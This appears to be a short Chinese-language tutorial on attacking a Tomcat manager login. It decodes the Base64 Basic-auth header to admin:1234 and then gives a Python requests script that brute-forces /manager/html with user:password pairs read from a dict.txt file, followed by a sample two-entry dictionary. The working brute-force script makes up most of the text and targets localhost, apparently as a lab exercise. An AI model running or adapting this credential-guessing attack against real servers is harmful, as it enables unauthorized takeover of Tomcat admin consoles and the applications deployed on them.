tomcat后台的地址是
http://127.0.0.1:8080/manager/html
通过谷歌游览器的无痕窗口检查分析,发现请求头的
Authorization: Basic YWRtaW46MTIzNA==
可能是用户名和密码
tomcat对用户名和密码进行了加密,根据等号,加密算法可能是base64
对YWRtaW46MTIzNA==进行base64解密,发现是用户名:密码
admin:1234
使用python3 的requests模块对tomcat后台进行爆破
import requests
import base64
url = "http://127.0.0.1:8080/manager/html"
with open("dict.txt", "r") as f:
while 1:
# 取出字典中的用户名和密码
passwd = f.readline()[:-1]
# 如果为空,dick.txt文件的最后一行,退出运行
if passwd == "":
break
# 对用户名和密码进行base64加密
Authorization = "Basic " + base64.b64encode(passwd.encode("utf-8")).decode("utf-8")
headers = {
"Authorization": Authorization
}
response = requests.get(url, headers=headers)
print(response.status_code)
# 根据返回的状态码,判断用户名和密码是否正确
if response.status_code == 200:
print("success")
print("用户名:密码" + passwd)
break
dict.txt 内容如下
tomcat:1234
admin:1234